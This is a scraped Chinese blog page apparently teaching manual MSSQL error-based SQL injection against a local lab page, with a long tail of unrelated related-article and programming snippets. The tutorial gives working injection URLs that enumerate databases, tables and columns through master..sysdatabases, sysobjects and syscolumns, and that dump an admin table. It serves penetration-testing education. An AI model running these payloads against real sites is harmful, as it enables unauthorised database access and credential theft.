LKmnbZ
LKmnbZ

渗透测试之MSSQL手工注入基本流程

1.   简单测试

  渗透测试之MSSQL手工注入基本流程_第1张图片

  渗透测试之MSSQL手工注入基本流程_第2张图片

  test.aspx 内容如下:

    <%@ Page Language="C#" AutoEventWireup="true" %>
    <%@ Import Namespace="System.Data" %>
    <%@ Import namespace="System.Data.SqlClient"  %>
    
    
     
    
    
    
        
    
    
        

        

     
            
                
                
                
                
    
            
     
        

        

    
    
http://192.168.20.155/test.aspx?id=1

  渗透测试之MSSQL手工注入基本流程_第3张图片

2.   获取数据库名

test.aspx?id=1 and db_name()>0;

http://192.168.20.155/test.aspx?id=1%20and%20db_name()>0

  渗透测试之MSSQL手工注入基本流程_第4张图片

  渗透测试之MSSQL手工注入基本流程_第5张图片

3.   爆库名

test.aspx?id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4 )--+

http://192.168.20.155/test.aspx?id=1%20and%201=(select%20top%201%20name%20from%20master..sysdatabases%20where%20dbid>4%20)--+

 渗透测试之MSSQL手工注入基本流程_第6张图片

 系统前四个默认一般为系统数据库 所以dbid从五开始查询 第一个为ZoomLa

 渗透测试之MSSQL手工注入基本流程_第7张图片

 获取非系统数据库的名字不等于asp_test的数据库名

test.aspx?id=1 and 1=(select top 1 name from master..sysdatabases where dbid>4 and name<> 'asp_test')--+
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20top%201%20name%20from%20master..sysdatabases%20where%20dbid>4%20and%20name<>%20'asp_test')--+

  渗透测试之MSSQL手工注入基本流程_第8张图片

  渗透测试之MSSQL手工注入基本流程_第9张图片

  获取dbid为6的数据库名

test.aspx?id=1 and 1=(select name from master..sysdatabases where dbid=6)--+
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20top%201%20name%20from%20master..sysdatabases%20where%20dbid=6%20)--+

  渗透测试之MSSQL手工注入基本流程_第10张图片

  渗透测试之MSSQL手工注入基本流程_第11张图片

  一次性获取全部数据库

test.aspx?id=1 and 1=(select name from master..sysdatabases for xml path)--+
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20name%20from%20master..sysdatabases%20for%20xml%20path)--+

  渗透测试之MSSQL手工注入基本流程_第12张图片

  渗透测试之MSSQL手工注入基本流程_第13张图片

4.   爆表名

test.aspx?id=1 and 1=(select name from asp_test..sysobjects for xml path)--+
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20name%20from%20asp_test..sysobjects%20for%20xml%20path)--+

  渗透测试之MSSQL手工注入基本流程_第14张图片

  打开视图-系统视图  能看到sys.objects

  渗透测试之MSSQL手工注入基本流程_第15张图片

   查询asp_test下面的用户表select * from sysobjects where xtype='u'

   渗透测试之MSSQL手工注入基本流程_第16张图片

   查询asp_test下面的用户表select * from sysobjects where xtype='u'

   渗透测试之MSSQL手工注入基本流程_第17张图片

   查询asp_test下面的除了admin和sqlmapoutput的用户表

select * from sysobjects where xtype='u' and name <> 'admin' and name <> 'sqlmapoutput'

  渗透测试之MSSQL手工注入基本流程_第18张图片

  查询排在第一位的asp_test下的名字不为sqlmapoutput的表名

select top 1 name from asp_test..sysobjects where xtype='u' and name <> 'sqlmapoutput'
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20top%201%20name%20from%20asp_test..sysobjects%20where%20xtype='u'%20and%20name%20<>%20'sqlmapoutput')--+

  渗透测试之MSSQL手工注入基本流程_第19张图片

  渗透测试之MSSQL手工注入基本流程_第20张图片

xtype

xtype可以是下列对象类型中的一种:

C = CHECK 约束  D = 默认值或 DEFAULT 约束  F = FOREIGN KEY 约束  L = 日志  FN = 标量函数

IF = 内嵌表函数    P = 存储过程   PK = PRIMARY KEY 约束(类型是 K)   RF = 复制筛选存储过程

S = 系统表   TF = 表函数   TR = 触发器   U = 用户表   UQ = UNIQUE 约束(类型是 K)

V = 视图   X = 扩展存储过程

 4.   爆列名

test.aspx?id=1 and 1=(select top 1 name from asp_test..syscolumns where id=(select id from asp_test..sysobjects where name='admin') and name !='id' and name<> 'name')--+
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20top%201%20name%20from%20asp_test..syscolumns%20where%20id=(select%20id%20from%20asp_test..sysobjects%20where%20name='admin')%20and%20name%20!='id'%20and%20name<>%20'name')--+

  先在sysobjects中查询admin表的id值 再拿id去syscolumns中查询列名

  渗透测试之MSSQL手工注入基本流程_第21张图片

  渗透测试之MSSQL手工注入基本流程_第22张图片

  渗透测试之MSSQL手工注入基本流程_第23张图片

5.   爆字段值

select name from asp_test..admin
http://192.168.20.155/test.aspx?id=1%20and%201=(select%20name%20from%20asp_test..admin%20for%20xml%20path)--+

  渗透测试之MSSQL手工注入基本流程_第24张图片

  渗透测试之MSSQL手工注入基本流程_第25张图片

你可能感兴趣的:(渗透测试基础)

  • 网络安全工程师自主学习计划表(具体到阶段目标) 大模型综述 web安全网络安全系统安全安全学习
    前言接下来我将给大家分享一份网络安全工程师自学计划指南,全文将从学习路线、学习规划、学习方法三个方向来讲述零基础小白如何通过自学进阶网络安全工程师,全文篇幅有点长,同学们可以先点个收藏,以免日后错过了。目录前言学习路线学习规划初级1、网络安全理论知识(2天)2、渗透测试基础(1周)3、操作系统基础(1周)4、计算机网络基础(1周)5、数据库基础操作(2天)6、Web渗透(1周)中级、高级7、脚本编
  • 网络安全最新网络安全-SSRF漏洞原理、攻击与防御(1),2024年最新网络安全程序员架构之路该如何继续学习 2401_84265972 程序员网络安全学习面试
    如何自学黑客&网络安全黑客零基础入门学习路线&规划初级黑客1、网络安全理论知识(2天)①了解行业相关背景,前景,确定发展方向。②学习网络安全相关法律法规。③网络安全运营的概念。④等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)①渗透测试的流程、分类、标准②信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking③漏洞扫描、漏洞利用、原理,利用方法、工具(MSF
  • 【42万字,2902页】全网最全《零基础网络安全/黑客自学笔记》,爆肝分享! 网安员阿道夫 web安全安全网络安全
    这次为大家带来一份零基础也能学会的《全网最全黑客自学笔记》,“全网最全”可不是吹牛的,整个笔记一共42万字,2902页,95个章节。这份笔记涵盖了网络安全导论、渗透测试基础、网络基础、Linux操作系统基础、web安全等等入门知识点;也有密码爆破、漏洞挖掘、SQL注入等进阶技术;还有反序列化漏洞、RCE、内网渗透、流量分析等高阶提升内容;最后还总结了一套护网蓝队攻略。部分内容展示:因为所包含的内容
  • 内网渗透测试基础——Windows PowerShell篇 Bruce_Liuxiaowei 渗透测试笔记总结经验windows安全
    内网渗透测试基础——WindowsPowerShell篇1.WindowsPowerShell基础WindowsPowerShell是一种命令行外壳程序和脚本环境,它内置在每个受支持的Windows版本中(Windows7、WindowsServer2008R2及更高版本),为Windows命令行使用者和脚本编写者利用.NETFramework的强大功能提供了便利。只要可以在一台计算机上运行代码,
  • 『渗透测试基础』| 什么是渗透测试?有哪些常用方法?如何开展?测试工具有哪些?优势在哪里? 虫无涯 ❤渗透测试❤渗透测试安全测试测试工具
    『渗透测试基础』|什么是渗透测试?有哪些常用方法?如何开展?测试工具有哪些?优势在哪里?1什么是渗透测试?2有哪些常用方法?2.1针对性测试2.2外部测试2.3内部测试2.4盲测2.5双盲测试3如何开展渗透测试?3.1规划和侦查3.2安全扫描3.3获取访问权限3.4维持访问权限3.5入侵分析4常用的渗透测试工具有哪些?4.1Nmap4.1.1简介4.1.2主要功能4.1.3一些命令4.1.4基本扫
  • 网络安全(黑客)自学笔记+学习路线+配套视频教程(超详细) 网络安全陈火乐 web安全网络安全云原生数据库python计算机网络
    前言最近发现,关注我的很多朋友虽然已经从事网安相关工作,但对于网安领域的整个架构,以及最值钱的技术模块还是比较迷茫。分享一个简单的方法,查看目标岗位的职位要求。你刷完BOSS所有周围网安职位会发现,网安理论知识,渗透测试基础,数据库基础操作,web渗透等,这些是必备的。掌握这些你就能胜任一份基本的网安相关的工作,比如Web渗透、安全分析,渗透测试等,薪资范围8k-15k。再往下探索,你需要掌握主流
  • Web渗透-SQL注入 YikJiang_ MySQL前端
    渗透测试基础一、渗透攻击流程二、渗透测试主流工具域名注册信息查询:Whois在线查询目标网络信息DNS和IP,nslookup在线漏洞搜索引擎:fofa.info,shodan.io,zoomeyes.org(https://www.zoomeye.org/)指纹识别:CMS识别工具(如:http://whatweb.bugscaner.com/batch.html),操作系统识别工具综合扫描:N
  • 深信服安全服务认证(SCSA-S)学习笔记:第二章 渗透测试基础 不做龙套 SCSA-S认证学习笔记网络安全
    目录一、渗透测试概述1、渗透测试与APT2、渗透测试执行标准3、渗透测试报告二、渗透测试测试环境搭建及工具使用1、KaliLinux基础2、渗透测试目标环境构建(1)基于LANMP构建PHP测试环境(2)基于WAMP构建PHP测试环境(3)基于PHPstudy构建PHP测试环境(4)典型环境漏洞的建立:3、Nmap(1)Nmap介绍(2)主机发现(3)端口扫描(4)应用程序与版本信息侦测(5)操作
  • 深信服技术认证“SCSA-S”划重点:渗透测试工具使用 sangfor_edu web安全安全
    为帮助大家更加系统化的学习网络安全知识,尽快通过深信服安全服务认证工程师认证,深信服推出“SCSA-S认证备考秘笈”共十期内容,“考试重点”内容框架,帮助大家快速get重点知识~划重点来啦深信服安全服务认证工程师(SCSA-S),定位于普适性的安全服务技术,适合在校生、应届毕业生或具备0-3年工作经验的网络安全工程师。该认证包含网络安全法律法规、操作系统基础、计算机网络基础、渗透测试基础、漏洞扫描
  • 网络安全工程师毕业答辩杂记 告诉桃花不用开了 黑客技巧渗透测试经验分享系统安全web安全安全架构安全
    目录01数通技术知识要点...102渗透测试基础...103渗透测试环境搭建与工具使用...104信息收集...105web安全...206不定性拓展内容...207应急响应...208安全基线...309操作系统要点...301数通技术知识要点TCP/IP模型及OSI七层模型结构、名字、对应关系TCP/IP网络层、传输层、数据链路层头部(尾部)结构(哪些主要字段,每个字段的用途)及长度。IP子网
  • 万字渗透测试入门知识点,自学查漏补缺 蚁景网安 1024程序员节网络安全安全性测试
    后续慢慢更新各个知识点的内容~知识点目录渗透工具环境安装Java环境安装Python环境安装KaliLinux配置与使用VMware安装kaliVMware虚拟网络编辑Linux使用基础Kalilinux配置kali工具内网靶场虚拟环境搭建云服务器Docker渗透测试基础网络协议基础信息收集WEB安全基础WEB漏洞扫描器漏洞攻击弱口令密码破解未授权访问漏洞Weblogic漏洞Jboss漏洞Stru
  • 小白高效自学-网络安全(黑客技术) 德西德西 web安全安全网络安全网络学习python笔记
    网络安全零基础入门学习路线&规划初级1、网络安全理论知识(2天)了解行业相关背景,前景,确定发展方向。学习网络安全相关法律法规。网络安全运营的概念。等保简介、等保规定、流程和规范。(非常重要)2、渗透测试基础(一周)渗透测试的流程、分类、标准信息收集技术:主动/被动信息搜集、Nmap工具、GoogleHacking漏洞扫描、漏洞利用、原理,利用方法、工具(MSF)、绕过IDS和反病毒侦察主机攻防演
  • 渗透测试基础知识----MySQL 配置 雨笋教育 mysql数据库服务器网络安全渗透测试
    MySQL配置1、创建mysql运行使用的用户mysql$/usr/sbin/groupaddmysql$/usr/sbin/useradd-gmysqlmysql2、创建binlog和库的存储路径并赋予mysql用户权限$mkdir-p/usr/local/webserver/mysql/binlog/www/data_mysql$chownmysql.mysql/usr/local/webse
  • 渗透测试基础知识 百密不疏 渗透测试渗透测试
    ##知识科普CMS:ContentManagementSystem的缩写,译为内容管理系统Webshell:通过Web入侵的一种脚本工具,可以据此对网站服务进行一定程度的控制Gateway网关,这个单词比较重要网关(Gateway):又叫网间连接器、协议转换器。网关在网络层实现网络互联,是复杂的网络互连设别,仅用于两个高层协议不同的网络互连。网关既可以用于广域网互连,也可以用于局域网互连。网关、交
  • 安全渗透测试基础知识之网络基础知识 布丁_码到成功 安全渗透测试经验细致分享网络安全性测试web安全
    一、OSI七层模型7应用层6表示层5会话层4传输层3网络层2数据链路层1物理层1.物理层提供通信介质和接口标准网线2.网络链路层提供二层寻扯/MAC地址和二层通信(交换机)功能协议:以太网Ethernet3.网络层提供三层寻扯/IP地址和三层通信(路由器
  • 手机app逆向、渗透测试基础工具介绍 5wimming 安全android安全漏洞
    手机app逆向基础工具介绍1、夜神模拟器2、Androidkiller--apk反编译工具3、burpsuite--代理工具4、jeb--Android反编绎工具安装使用5、ddms--Dalvik虚拟机调试监控服务安装使用1、夜神模拟器夜神模拟器是一款可以在mac或者windows上运行的模拟器,用于运行手机软件。下载地址:https://www.yeshen.com/下载后安装即可。2、And
  • 渗透测试基础 -unserialize反序列化漏洞 jinxya phpjava安全
    渗透测试基础-unserialize反序列化漏洞什么是序列化什么是反序列化类|对象魔术方法反序列化靶场演练漏洞总结只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!什么是序列化serialize为序列化的意思unserialize为取消序列化,在这理解为反序列化那先来说一下,什么是序列化?:序列化(serialize)是将对象的状态信息转
  • web安全详解(渗透测试基础) Jinmindong web安全安全数据库linux程序员运维
    **文章目录一、Web基础知识1.http协议2.网络三种架构及特点3.Web应用的特点4.URL组成6.Http协议的性质7.请求响应报文的格式8.请求方法9.http缓存10.缓存新鲜度如何判断11.Http重定向原理以及状态码12.HTTPS协议数字证书13.HTTPS协议与HTTP协议的区别?14.Web客户端的作用15.Web服务端作用16.集群环境的作用17.什么是Cookie,Coo
  • 安全渗透测试基础之-Nessus漏洞扫描工具(安装下载) 布丁_码到成功 安全渗透测试经验细致分享学习技巧安全网络安全python
    【注:本文中所需软件请回复公众号后获取,有任何问题请留言,看到会第一时间回复,毕竟我有自己的工作,分享经验并不是主业,不能时刻关注到。如果您觉得我写的好,请记得将公众号设为星标公众号,否则下次可能找不到。先谢谢各位愿意努力奋斗的小伙伴们了。】本篇是安装下载,后面会有Nessus使用介绍,以及其他工具的介绍,请感兴趣的小伙伴继续关注!1.1Nessus漏洞扫描工具介绍Nessus是全球使用人数最多的
  • 安全渗透测试基础之漏洞扫描工具之Nessus使用介绍 布丁_码到成功 安全渗透测试经验细致分享学习技巧网络安全安全安全性测试
    前置条件:Nessus工具使用前要确保工具是服务状态systemctlstartnessusd.service启动nessus服务systemctlstatusnessusd.service查看nessus服务状态1.配置扫描模板2.新增高级扫描2.1设置日程表:2.2设置邮件收件人(可选):2.3主机发现:2.
  • 渗透测试基础-SQL server数据库之反弹注入 jinxya SQL注入数据库sql安全
    渗透测试基础-SQLserver数据库之反弹注入SQLserver数据库SQLserver显错注入靶场演练堆叠注入SQLserver反弹注入漏洞总结只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!SQLserver数据库既然要学习SQLserver数据库的注入知识,那当然得先了解一下SQLserver的语句。数据库都有着相通的地方,所以
  • 【渗透测试基础-3】渗透测试信息收集的内容及方法 像风一样9 #入门07Web安全之渗透测试搜索引擎网络
    目录1信息收集概述1.1目的1.2收集内容2收集域名信息2.1Whois查询2.1.1Whois简介2.1.2Whois操作2.2反查2.3备案信息查询3收集子域名信息3.1子域名查询网站3.2域传送漏洞3.3子域名检测工具3.3.1Layer子域名挖掘机5.0下载及使用3.3.2subDomainsBrute下载及使用3.4搜索引擎枚举3.5第三方聚合应用枚举3.6证书透明度公开曰志枚举4DNS
  • 渗透测试基础-反射型XSS原理及实操 jinxya XSS安全xss信息安全javascript
    渗透测试基础-反射型XSS原理及实操XSS是什么XSS的表现形式和利用流程反射型XSS的靶场演练漏洞总结只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!XSS是什么因为人们经常将跨站脚本攻击(CrossSiteScripting)缩写为CSS,但这会与层叠样式表(CascadingStyleSheets,CSS)的缩写混淆。因此,将跨站
  • 渗透测试基础 - APP渗透测试(上) jinxya 小程序安全
    渗透测试基础-APP渗透测试(上)简介抓取手机数据包实战APP渗透测试漏洞总结只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!简介【本篇核心思想】app渗透和web渗透没有本质区别在渗透测试这个领域,完全可以把这俩当成同一种东西不管是手机APP还是电脑APP,其底层还是数据交互,只要能控制数据,就能实现测试效果抓取手机数据包本身想直接贴
  • 渗透测试基础 - bypass-绕过阻挡我们的WAF(上) jinxya SQL注入安全
    渗透测试基础-bypass-绕过阻挡我们的WAF(上)简介(bypass与waf)网站环境准备常用绕过方法漏洞总结只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力!【请进行合法的渗透测试,有关内容只是用作个人复习。】简介(bypass与waf)bypass:咱们根据Google翻译的解释来看,是绕过的意思,且绕过是一个动作,那既然是动作,
  • 手机木马远程控制复现 内心如初 #网路安全实战智能手机网络安全安卓笔记linux学习经验分享
    目录目录前言系列文章列表渗透测试基础之永恒之蓝漏洞复现http://t.csdn.cn/EsMu2思维导图1,实验涉及复现环境2,Android模拟器环境配置2.1,首先从官网上下载雷电模拟器2.2,安装雷电模拟器2.3,对模拟器网络进行配置2.3.1,为什么要进行配置2.3.2,进行配置2.3.3,安装成功后显示安装成功3,生成后门3.1,生成木马apk文件3.2,将文件复制到windows系统
  • 渗透测试基础之永恒之蓝漏洞复现 内心如初 #网路安全实战安全web安全笔记系统安全网络安全windowslinux
    渗透测试+MS17-010(永恒之蓝)的漏洞复现目录渗透测试+MS17-010(永恒之蓝)的漏洞复现目录前言思维导图1,渗透测试1,1,什么是渗透测试?1.2,渗透测试的分类:1.3,渗透测试的流程1.3.1,前期交互1.3.2,情报收集1.3.3,威胁建模1.3.4,漏洞分析1.3.5,漏洞验证1.3.6,渗透攻击1.3.7,后渗透1.3.8,信息整理1.3.9,报告编写和提交2,MS17-01
  • Day1 渗透测试基础 安an2022 网络安全web安全
    渗透测试流程(PTES)前期交互——信息收集——威胁建模——漏洞分析、探测——漏洞验证——提升权限——报告输出——提出建议HVV流程——信息收集——漏洞挖掘——漏洞分析——权限提升——内网渗透——清除痕迹——事后信息分析1.对系统进行安全风险评估、安全隐患,以攻击技术+漏洞发现技术对系统进行深入的探测,验证挖掘点深入挖掘是否存在,提交报告2.️扫描网站、写病毒3.了解渗透方式以及系统的安全系统,确
  • Kali Linux渗透测试技术介绍【文末送书】 东离与糖宝 合作推广linux网络安全
    文章目录写在前面一、什么是KaliLinux二、渗透测试基础概述和方法论三、好书推荐1.书籍简介2.读者对象3.随书资源写作末尾写在前面对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络
  • 自学网络安全(黑客)全网详细路线 大安全家 web安全安全网络渗透测试网络安全黑客信息安全
    前言web渗透是网络安全大行业里入门板块,就像十年前的软件,前景非常被看好,薪资也很诱人。与软件测试和前端开发只需掌握一定的编程能力不同的是,渗透需要掌握的知识内容较多,花费的时间较长,渗透测试掌握代码是基础,其次还需要学习服务器操作系统数据库相关知识,web安全基础、渗透测试基础、漏洞原理和挖掘复现能力、代码审计,攻击和防守等等相关技术。关于渗透的前景,先说两个观点,脚本小子的时代已经过去了,知
  • Spring中@Value注解,需要注意的地方 无量 springbean@Valuexml
    Spring 3以后,支持@Value注解的方式获取properties文件中的配置值,简化了读取配置文件的复杂操作 1、在applicationContext.xml文件(或引用文件中)中配置properties文件 <bean id="appProperty" class="org.springframework.beans.fac
  • mongoDB 分片 开窍的石头 mongodb
        mongoDB的分片。要mongos查询数据时候 先查询configsvr看数据在那台shard上,configsvr上边放的是metar信息,指的是那条数据在那个片上。由此可以看出mongo在做分片的时候咱们至少要有一个configsvr,和两个以上的shard(片)信息。     第一步启动两台以上的mongo服务 &nb
  • OVER(PARTITION BY)函数用法 0624chenhong oracle
    这篇写得很好,引自 http://www.cnblogs.com/lanzi/archive/2010/10/26/1861338.html OVER(PARTITION BY)函数用法 2010年10月26日 OVER(PARTITION BY)函数介绍 开窗函数        &nb
  • Android开发中,ADB server didn't ACK 解决方法 一炮送你回车库 Android开发
    首先通知:凡是安装360、豌豆荚、腾讯管家的全部卸载,然后再尝试。   一直没搞明白这个问题咋出现的,但今天看到一个方法,搞定了!原来是豌豆荚占用了 5037 端口导致。 参见原文章:一个豌豆荚引发的血案——关于ADB server didn't ACK的问题 简单来讲,首先将Windows任务进程中的豌豆荚干掉,如果还是不行,再继续按下列步骤排查。 &nb
  • canvas中的像素绘制问题 换个号韩国红果果 JavaScriptcanvas
    pixl的绘制,1.如果绘制点正处于相邻像素交叉线,绘制x像素的线宽,则从交叉线分别向前向后绘制x/2个像素,如果x/2是整数,则刚好填满x个像素,如果是小数,则先把整数格填满,再去绘制剩下的小数部分,绘制时,是将小数部分的颜色用来除以一个像素的宽度,颜色会变淡。所以要用整数坐标来画的话(即绘制点正处于相邻像素交叉线时),线宽必须是2的整数倍。否则会出现不饱满的像素。 2.如果绘制点为一个像素的
  • 编码乱码问题 灵静志远 javajvmjsp编码
    1、JVM中单个字符占用的字节长度跟编码方式有关,而默认编码方式又跟平台是一一对应的或说平台决定了默认字符编码方式;2、对于单个字符:ISO-8859-1单字节编码,GBK双字节编码,UTF-8三字节编码;因此中文平台(中文平台默认字符集编码GBK)下一个中文字符占2个字节,而英文平台(英文平台默认字符集编码Cp1252(类似于ISO-8859-1))。 3、getBytes()、getByte
  • java 求几个月后的日期 darkranger calendargetinstance
    Date plandate = planDate.toDate(); SimpleDateFormat df = new SimpleDateFormat("yyyy-MM-dd"); Calendar cal = Calendar.getInstance(); cal.setTime(plandate); // 取得三个月后时间 cal.add(Calendar.M
  • 数据库设计的三大范式(通俗易懂) aijuans 数据库复习
    关系数据库中的关系必须满足一定的要求。满足不同程度要求的为不同范式。数据库的设计范式是数据库设计所需要满足的规范。只有理解数据库的设计范式,才能设计出高效率、优雅的数据库,否则可能会设计出错误的数据库. 目前,主要有六种范式:第一范式、第二范式、第三范式、BC范式、第四范式和第五范式。满足最低要求的叫第一范式,简称1NF。在第一范式基础上进一步满足一些要求的为第二范式,简称2NF。其余依此类推。
  • 想学工作流怎么入手 atongyeye jbpm
    工作流在工作中变得越来越重要,很多朋友想学工作流却不知如何入手。 很多朋友习惯性的这看一点,那了解一点,既不系统,也容易半途而废。好比学武功,最好的办法是有一本武功秘籍。研究明白,则犹如打通任督二脉。 系统学习工作流,很重要的一本书《JBPM工作流开发指南》。 本人苦苦学习两个月,基本上可以解决大部分流程问题。整理一下学习思路,有兴趣的朋友可以参考下。 1  首先要
  • Context和SQLiteOpenHelper创建数据库 百合不是茶 androidContext创建数据库
           一直以为安卓数据库的创建就是使用SQLiteOpenHelper创建,但是最近在android的一本书上看到了Context也可以创建数据库,下面我们一起分析这两种方式创建数据库的方式和区别,重点在SQLiteOpenHelper     一:SQLiteOpenHelper创建数据库:   1,SQLi
  • 浅谈group by和distinct bijian1013 oracle数据库group bydistinct
            group by和distinct只了去重意义一样,但是group by应用范围更广泛些,如分组汇总或者从聚合函数里筛选数据等。         譬如:统计每id数并且只显示数大于3 select id ,count(id) from ta
  • vi opertion 征客丶 macoprationvi
    进入 command mode (命令行模式) 按 esc 键 再按 shift + 冒号 注:以下命令中 带 $ 【在命令行模式下进行】,不带 $ 【在非命令行模式下进行】 一、文件操作 1.1、强制退出不保存 $ q! 1.2、保存 $ w 1.3、保存并退出 $ wq 1.4、刷新或重新加载已打开的文件 $ e 二、光标移动 2.1、跳到指定行 数字
  • 【Spark十四】深入Spark RDD第三部分RDD基本API bit1129 spark
      对于K/V类型的RDD,如下操作是什么含义?   val rdd = sc.parallelize(List(("A",3),("C",6),("A",1),("B",5)) rdd.reduceByKey(_+_).collect  reduceByKey在这里的操作,是把
  • java类加载机制 BlueSkator java虚拟机
    java类加载机制 1.java类加载器的树状结构 引导类加载器 ^ | 扩展类加载器 ^ | 系统类加载器 java使用代理模式来完成类加载,java的类加载器也有类似于继承的关系,引导类是最顶层的加载器,它是所有类的根加载器,它负责加载java核心库。当一个类加载器接到装载类到虚拟机的请求时,通常会代理给父类加载器,若已经是根加载器了,就自己完成加载。 虚拟机区分一个Cla
  • 动态添加文本框 BreakingBad 文本框
      <script>     var num=1; function AddInput() {      var str="";     str+="<input 
  • 读《研磨设计模式》-代码笔记-单例模式 bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ public class Singleton { } /* * 懒汉模式。注意,getInstance如果在多线程环境中调用,需要加上synchronized,否则存在线程不安全问题 */ class LazySingleton
  • iOS应用打包发布常见问题 chenhbc iosiOS发布iOS上传iOS打包
    这个月公司安排我一个人做iOS客户端开发,由于急着用,我先发布一个版本,由于第一次发布iOS应用,期间出了不少问题,记录于此。   1、使用Application Loader 发布时报错:Communication error.please use diagnostic mode to check connectivity.you need to have outbound acc
  • 工作流复杂拓扑结构处理新思路 comsci 设计模式工作算法企业应用OO
    我们走的设计路线和国外的产品不太一样,不一样在哪里呢?  国外的流程的设计思路是通过事先定义一整套规则(类似XPDL)来约束和控制流程图的复杂度(我对国外的产品了解不够多,仅仅是在有限的了解程度上面提出这样的看法),从而避免在流程引擎中处理这些复杂的图的问题,而我们却没有通过事先定义这样的复杂的规则来约束和降低用户自定义流程图的灵活性,这样一来,在引擎和流程流转控制这一个层面就会遇到很
  • oracle 11g新特性Flashback data archive daizj oracle
    1. 什么是flashback data archive Flashback data archive是oracle 11g中引入的一个新特性。Flashback archive是一个新的数据库对象,用于存储一个或多表的历史数据。Flashback archive是一个逻辑对象,概念上类似于表空间。实际上flashback archive可以看作是存储一个或多个表的所有事务变化的逻辑空间。
  • 多叉树:2-3-4树 dieslrae
        平衡树多叉树,每个节点最多有4个子节点和3个数据项,2,3,4的含义是指一个节点可能含有的子节点的个数,效率比红黑树稍差.一般不允许出现重复关键字值.2-3-4树有以下特征:     1、有一个数据项的节点总是有2个子节点(称为2-节点)     2、有两个数据项的节点总是有3个子节点(称为3-节
  • C语言学习七动态分配 malloc的使用 dcj3sjt126com clanguagemalloc
    /* 2013年3月15日15:16:24 malloc 就memory(内存) allocate(分配)的缩写 本程序没有实际含义,只是理解使用 */ # include <stdio.h> # include <malloc.h> int main(void) { int i = 5; //分配了4个字节 静态分配 int * p
  • Objective-C编码规范[译] dcj3sjt126com 代码规范
      原文链接 : The official raywenderlich.com Objective-C style guide 原文作者 : raywenderlich.com Team 译文出自 : raywenderlich.com Objective-C编码规范 译者 : Sam Lau
  • 0.性能优化-目录 frank1234 性能优化
    从今天开始笔者陆续发表一些性能测试相关的文章,主要是对自己前段时间学习的总结,由于水平有限,性能测试领域很深,本人理解的也比较浅,欢迎各位大咖批评指正。 主要内容包括: 一、性能测试指标 吞吐量、TPS、响应时间、负载、可扩展性、PV、思考时间 http://frank1234.iteye.com/blog/2180305 二、性能测试策略 生产环境相同 基准测试 预热等 htt
  • Java父类取得子类传递的泛型参数Class类型 happyqing java泛型父类子类Class
      import java.lang.reflect.ParameterizedType; import java.lang.reflect.Type; import org.junit.Test; abstract class BaseDao<T> { public void getType() { //Class<E> clazz =
  • 跟我学SpringMVC目录汇总贴、PDF下载、源码下载 jinnianshilongnian springMVC
      ----广告-------------------------------------------------------------- 网站核心商详页开发 掌握Java技术,掌握并发/异步工具使用,熟悉spring、ibatis框架; 掌握数据库技术,表设计和索引优化,分库分表/读写分离; 了解缓存技术,熟练使用如Redis/Memcached等主流技术; 了解Ngin
  • the HTTP rewrite module requires the PCRE library 流浪鱼 rewrite
    ./configure: error: the HTTP rewrite module requires the PCRE library. 模块依赖性Nginx需要依赖下面3个包 1. gzip 模块需要 zlib 库 ( 下载: http://www.zlib.net/ ) 2. rewrite 模块需要 pcre 库 ( 下载: http://www.pcre.org/ ) 3. s
  • 第12章 Ajax(中) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • Optimize query with Query Stripping in Web Intelligence blueoxygen BO
    http://wiki.sdn.sap.com/wiki/display/BOBJ/Optimize+query+with+Query+Stripping+in+Web+Intelligence and a very straightfoward video http://www.sdn.sap.com/irj/scn/events?rid=/library/uuid/40ec3a0c-936
  • Java开发者写SQL时常犯的10个错误 tomcat_oracle javasql
    1、不用PreparedStatements   有意思的是,在JDBC出现了许多年后的今天,这个错误依然出现在博客、论坛和邮件列表中,即便要记住和理解它是一件很简单的事。开发者不使用PreparedStatements的原因可能有如下几个:   他们对PreparedStatements不了解   他们认为使用PreparedStatements太慢了   他们认为写Prepar
  • 世纪互联与结盟有感 阿尔萨斯
    10月10日,世纪互联与(Foxcon)签约成立合资公司,有感。 全球电子制造业巨头(全球500强企业)与世纪互联共同看好IDC、云计算等业务在中国的增长空间,双方迅速果断出手,在资本层面上达成合作,此举体现了全球电子制造业巨头对世纪互联IDC业务的欣赏与信任,另一方面反映出世纪互联目前良好的运营状况与广阔的发展前景。 众所周知,精于电子产品制造(世界第一),对于世纪互联而言,能够与结盟
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他